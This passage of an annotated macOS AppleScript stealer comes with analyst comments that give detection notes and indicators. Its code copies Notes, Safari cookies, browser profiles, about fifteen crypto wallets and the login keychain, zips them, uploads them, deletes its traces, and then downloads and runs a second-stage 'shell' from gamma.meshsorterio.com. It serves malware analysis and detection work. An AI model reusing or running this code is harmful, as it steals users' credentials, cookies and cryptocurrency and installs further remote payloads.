  351. readwrite(rawlib & "-wal", writemind & "Notes/NoteStore.sqlite-wal")
  352. readwrite(rawlib & "-shm", writemind & "Notes/NoteStore.sqlite-shm")
  353. readwrite(rawlib & "Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies", writemind & "Files/Cookies.binarycookies")
  354. readwrite(rawlib & "Cookies/Cookies.binarycookies", writemind & "Files/saf1")
  355.  
  356. filegrabber(writemind)
  357.  
  -- Chromium-family browsers: pairs of short label and user-data folder under ~/Library/Application Support.
  358. set chromiumMap to {{"chr", library & "Google/Chrome/"}, {"brave", library & "BraveSoftware/Brave-Browser/"}, {"edge", library & "Microsoft Edge/"}, {"viva", library & "Vivaldi/"}, {"op", library & "com.operasoftware.Opera/"}, {"opgx", library & "com.operasoftware.OperaGX/"}, {"chr_b", library & "Google/Chrome Beta/"}, {"chr_c", library & "Google/Chrome Canary"}, {"chrm", library & "Chromium/"}, {"chr_dev", library & "Google/Chrome Dev/"}, {"arc", library & "Arc/User Data/"}}
  359.  
  -- Desktop wallet applications: pairs of label and data folder, copied wholesale by GrabFolder further down.
  360. set walletMap to {{"Electrum", systemProfile & "/.electrum/wallets/"}, {"Coinomi", library & "Coinomi/wallets/"}, {"Exodus", library & "Exodus/"}, {"Atomic", library & "atomic/Local Storage/leveldb/"}, {"Wasabi", systemProfile & "/.walletwasabi/client/Wallets/"}, {"Ledger_Live", library & "Ledger Live/"}, {"Monero", systemProfile & "/Monero/wallets/"}, {"Bitcoin_Core", library & "Bitcoin/wallets/"}, {"Litecoin_Core", library & "Litecoin/wallets/"}, {"Dash_Core", library & "DashCore/wallets/"}, {"Electrum_LTC", systemProfile & "/.electrum-ltc/wallets/"}, {"Electron_Cash", systemProfile & "/.electron-cash/wallets/"}, {"Guarda", library & "Guarda/"}, {"Dogecoin_Core", library & "Dogecoin/wallets/"}, {"Trezor_Suite", library & "@trezor/suite-desktop/"}}
  361. readwrite(library & "Binance/app-store.json", writemind & "deskwallets/Binance/app-store.json")
  362. readwrite(library & "@tonkeeper/desktop/config.json", "deskwallets/TonKeeper/config.json")
  -- The login keychain database is copied as a file; together with the captured login password this exposes its contents.
  363. readwrite(rawlib & "Keychains/login.keychain-db", writemind & "Kch/login.keychain-db")
  364.  
  365. writeText(username, writemind & "user")
  -- Gecko-family browsers (Firefox, Waterfox) handled by parseFF.
  366. set ff_paths to {{"ff", library & "Firefox/Profiles/"}, {"wf", library & "Waterfox/Profiles/"}}
  367. repeat with gecko in ff_paths
  368. try
  369. parseFF(item 1 of gecko, item 2 of gecko, writemind)
  370. end try
  371. end repeat
  372.  
  373. repeat with deskWallet in walletMap
  374. GrabFolder(item 2 of deskWallet, writemind & "Wlt/" & item 1 of deskWallet)
  375. end repeat
  376. chromium(writemind, chromiumMap)
  -- Detection note: ditto -c -k builds a zip archive; osascript spawning ditto with a /tmp source and
  -- a /tmp/*.zip target, followed by curl and rm, is the process chain of the packaging and upload stage.
  377. do shell script "ditto -c -k --sequesterRsrc " & writemind & " /tmp/salmonela.zip"
  378. send_data(0, outUsername, serverIP, isBot)
  379. do shell script "rm -r " & writemind
  380. do shell script "rm /tmp/salmonela.zip"
  381. end main
  382.  
  -- Entry point of the first script. The quote after main() closes it, and the shell "&" puts that
  -- osascript in the background while a second osascript starts at once.
  383. main()' & osascript -e 'try
  -- Second script: after a 30 second delay it downloads SHS.zip from gamma.meshsorterio.com into /tmp,
  -- unpacks it over existing files, marks the file named "shell" executable and runs it.
  -- This is a follow-on payload stage, separate from the data collection above.
  -- Indicators: host gamma.meshsorterio.com, path /trovo/index.php, files /tmp/SHS.zip and /tmp/shell.
  -- The paste ends after the next line; the closing of this try block and of the quoted script is not on the page.
  384. delay 30
  385. do shell script "cd /tmp/ && curl https://gamma.meshsorterio.com/trovo/index.php --output SHS.zip && unzip -o SHS.zip && chmod +x shell && ./shell"